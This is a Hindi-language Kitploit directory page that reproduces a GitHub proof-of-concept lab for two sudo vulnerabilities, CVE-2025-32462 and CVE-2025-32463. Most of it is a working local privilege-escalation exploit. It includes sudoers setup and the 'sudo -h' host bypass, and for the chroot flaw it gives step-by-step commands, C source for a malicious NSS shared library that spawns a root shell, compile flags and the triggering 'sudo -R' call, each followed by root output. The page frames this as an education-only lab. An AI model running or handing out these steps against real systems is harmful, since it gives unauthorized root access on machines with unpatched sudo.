Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32462_32463-Lab — CVE-2025-32462 & CVE-2025-32463 (sudo) के लिए Docker PoC, Stratascale CRU अनुसंधान पर आधारित। | Kitploit
उपकरण/GitHubGitHub/maaythm/cve-2025-32462_32463-lab
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubmaaythm/cve-2025-32462_32463-lab

CVE-2025-32462_32463-Lab

CVE-2025-32462 & CVE-2025-32463 (sudo) के लिए Docker PoC, Stratascale CRU अनुसंधान पर आधारित।

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32462 और CVE-2025-32463 – PoC लैब

यह sudo में निम्नलिखित कमजोरियों के लिए एक कंटेनर-आधारित लैब और PoC है:

  • CVE-2025-32462 – sudo -h होस्ट मिलान तर्क बाईपास
  • CVE-2025-32463 – sudo -R chroot NSS लाइब्रेरी एस्केप

🔒 केवल शैक्षिक उद्देश्यों के लिए। ऐसे सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।


🔬 मूल अनुसंधान

  • CVE-2025-32462 के लिए ब्लॉग पोस्ट: sudo होस्ट उपनाम विशेषाधिकार वृद्धि
  • CVE-2025-32463 के लिए ब्लॉग पोस्ट: sudo chroot NSS बाईपास

🧠 अनुसंधान क्रेडिट

  • Rich Mirch
    Stratascale Cyber Research Unit (CRU)
    @Stratascale

🧪 लैब सेटअप (डॉकर)

🔧 Dockerfile

root@kitploit:~
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
                       pkg-config libssl-dev git nano gcc && \
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
    tar xzf sudo-1.9.16p2.tar.gz && \
    cd sudo-1.9.16p2 && \
    ./configure --disable-gcrypt --prefix=/usr && make && make install

RUN useradd -m -s /bin/bash pwn && echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

🚀 बिल्ड और चलाएं

root@kitploit:~
docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d --network sudolabnet --ip 172.190.0.3 --hostname 'lowpriv.test.local' --add-host highpriv.test.local:172.190.0.2 --name lowpriv sudo-vuln-lab tail -f /dev/null

CVE-2025-32462 के लिए अतिरिक्त सेटअप

root@kitploit:~
docker exec -u root -it lowpriv bash

# inside root shell of docker container
root@lowpriv:/home/pwn# echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

मैन्युअल शोषण

CVE-2025-32462

सामान्य संचालन

root@kitploit:~
pwn@lowpriv:~$ sudo id
Password: ^C
sudo: a password is required

शोषण

root@kitploit:~
pwn@lowpriv:~$ sudo -h highpriv.test.local id
uid=0(root) gid=0(root) groups=0(root)

pwn@lowpriv:~$ sudo -h highpriv.test.local hostname -f
lowpriv.test.local

CVE-2025-32463

सामान्य संचालन

root@kitploit:~
pwn@lowpriv:~$ sudo id
Password: 
pwn is not allowed to run sudo on lowpriv.

तैयारी

root@kitploit:~
# Step 1: Create the chroot directory structure
mkdir -p exploitDir/etc

# Step 2: Write a malicious nsswitch.conf to load our exploit module
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf

# Step 3: Create directory for the malicious NSS library
mkdir libnss_

# Step 4: Copy necessary group file into chroot environment
cp /etc/group exploitDir/etc/

# Step 5: Write the malicious NSS shared library source code
cat > cve_2025_32463.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void GIVEMEROOT(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

# Step 6: Compile the malicious NSS shared library
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

# Step 7: Launch sudo with chroot to trigger the vulnerability
sudo -R exploitDir HEHE RUN THIS AND GIVE ME ROOT

root@lowpriv:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

अस्वीकरण

यह PoC केवल शैक्षिक और अधिकृत अनुसंधान के लिए है।


✍️ लेखक

PoC लैब और डॉकर वातावरण MAAYTHM द्वारा।

अनुसंधान क्रेडिट: Rich Mirch – Stratascale CRU

टूल डाउनलोड करें